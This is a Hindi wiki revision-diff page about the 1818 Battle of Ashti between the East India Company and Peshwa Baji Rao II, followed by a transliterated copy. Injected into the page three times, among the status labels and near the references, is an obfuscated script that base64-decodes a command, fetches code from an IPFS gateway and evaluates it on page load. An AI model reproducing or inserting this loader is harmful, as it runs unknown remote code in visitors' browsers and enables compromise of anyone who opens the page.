Difference between revisions of "आष्टी की लड़ाई"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
आष्टी की लड़ाई [[20 फ़रवरी]], 1818 ई. को [[ईस्ट इंडिया कम्पनी]] और [[पेशवा बाजीराव द्वितीय]] के बीच [[आंग्ल-मराठा युद्ध तृतीय|तृतीय आंग्ल-मराठा युद्ध]] (1817-18) के दौरान [[पूना]] में हुई।  
 
आष्टी की लड़ाई [[20 फ़रवरी]], 1818 ई. को [[ईस्ट इंडिया कम्पनी]] और [[पेशवा बाजीराव द्वितीय]] के बीच [[आंग्ल-मराठा युद्ध तृतीय|तृतीय आंग्ल-मराठा युद्ध]] (1817-18) के दौरान [[पूना]] में हुई।  
  
==इतिहास==
+
==इतिहास से==
 
आष्टी की लड़ाई में [[पेशवा]] की सेना हार गई और उसका योग्य सेनापति गोखले मारा गया। इस पराजय के फलस्वरूप पेशवा ने [[जून]], 1818 ई. में आत्म समर्पण कर दिया। इससे पहले [[नवम्बर]] 1817 में बाजीराव द्वितीय के नेतृत्व में संगठित मराठा सेना ने पूना की 'अंग्रेज़ी रेजीडेन्सी' को लूटकर जला दिया और खड़की स्थिति अंग्रेज़ी सेना पर हमला कर दिया, लेकिन वह पराजित हो गया। तदनन्तर वह दो और लड़ाइयों - जनवरी 1818 में कोरे गाँव और एक महीने के बाद आष्टी की लड़ाई में पराजित हुआ। उसने भागने की कोशिश की, लेकिन 3 जून, 1818 ई. को उसे अंग्रेज़ों के सामने आत्म समर्पण करना पड़ा। अंग्रेज़ों ने इस बार पेशवा का पद ही समाप्त कर दिया और बाजीराव द्वितीय को अपदस्थ करके बंदी के रूप में [[कानपुर]] के निकट [[बिठूर]] भेज दिया, जहाँ 1853 ई. में उसकी मृत्यु हो गई।<ref>{{cite web |url=http://hi.bharatdiscovery.org/india/%E0%A4%AA%E0%A5%87%E0%A4%B6%E0%A4%B5%E0%A4%BE_%E0%A4%AC%E0%A4%BE%E0%A4%9C%E0%A5%80%E0%A4%B0%E0%A4%BE%E0%A4%B5_%E0%A4%A6%E0%A5%8D%E0%A4%B5%E0%A4%BF%E0%A4%A4%E0%A5%80%E0%A4%AF |title=बाजीराव द्वितीय |accessmonthday=[[21 अप्रॅल]] |accessyear=2012 |last= |first= |authorlink= |format=पी.एच.पी. |publisher=भारतकोश |language=हिन्दी }}</ref>  
 
आष्टी की लड़ाई में [[पेशवा]] की सेना हार गई और उसका योग्य सेनापति गोखले मारा गया। इस पराजय के फलस्वरूप पेशवा ने [[जून]], 1818 ई. में आत्म समर्पण कर दिया। इससे पहले [[नवम्बर]] 1817 में बाजीराव द्वितीय के नेतृत्व में संगठित मराठा सेना ने पूना की 'अंग्रेज़ी रेजीडेन्सी' को लूटकर जला दिया और खड़की स्थिति अंग्रेज़ी सेना पर हमला कर दिया, लेकिन वह पराजित हो गया। तदनन्तर वह दो और लड़ाइयों - जनवरी 1818 में कोरे गाँव और एक महीने के बाद आष्टी की लड़ाई में पराजित हुआ। उसने भागने की कोशिश की, लेकिन 3 जून, 1818 ई. को उसे अंग्रेज़ों के सामने आत्म समर्पण करना पड़ा। अंग्रेज़ों ने इस बार पेशवा का पद ही समाप्त कर दिया और बाजीराव द्वितीय को अपदस्थ करके बंदी के रूप में [[कानपुर]] के निकट [[बिठूर]] भेज दिया, जहाँ 1853 ई. में उसकी मृत्यु हो गई।<ref>{{cite web |url=http://hi.bharatdiscovery.org/india/%E0%A4%AA%E0%A5%87%E0%A4%B6%E0%A4%B5%E0%A4%BE_%E0%A4%AC%E0%A4%BE%E0%A4%9C%E0%A5%80%E0%A4%B0%E0%A4%BE%E0%A4%B5_%E0%A4%A6%E0%A5%8D%E0%A4%B5%E0%A4%BF%E0%A4%A4%E0%A5%80%E0%A4%AF |title=बाजीराव द्वितीय |accessmonthday=[[21 अप्रॅल]] |accessyear=2012 |last= |first= |authorlink= |format=पी.एच.पी. |publisher=भारतकोश |language=हिन्दी }}</ref>  
  

Revision as of 14:48, 21 April 2012

ashti ki l daee 20 faravari, 1818 ee. ko eest iandiya kampani aur peshava bajirav dvitiy ke bich tritiy aangl-maratha yuddh (1817-18) ke dauran poona mean huee.

itihas se

ashti ki l daee mean peshava ki sena har gee aur usaka yogy senapati gokhale mara gaya. is parajay ke phalasvaroop peshava ne joon, 1818 ee. mean atm samarpan kar diya. isase pahale navambar 1817 mean bajirav dvitiy ke netritv mean sangathit maratha sena ne poona ki 'aangrezi rejidensi' ko lootakar jala diya aur kh daki sthiti aangrezi sena par hamala kar diya, lekin vah parajit ho gaya. tadanantar vah do aur l daiyoan - janavari 1818 mean kore gaanv aur ek mahine ke bad ashti ki l daee mean parajit hua. usane bhagane ki koshish ki, lekin 3 joon, 1818 ee. ko use aangrezoan ke samane atm samarpan karana p da. aangrezoan ne is bar peshava ka pad hi samapt kar diya aur bajirav dvitiy ko apadasth karake bandi ke roop mean kanapur ke nikat bithoor bhej diya, jahaan 1853 ee. mean usaki mrityu ho gee.[1]



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. bajirav dvitiy (hindi) (pi.ech.pi.) bharatakosh. abhigaman tithi: 21 aprॅl, 2012.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>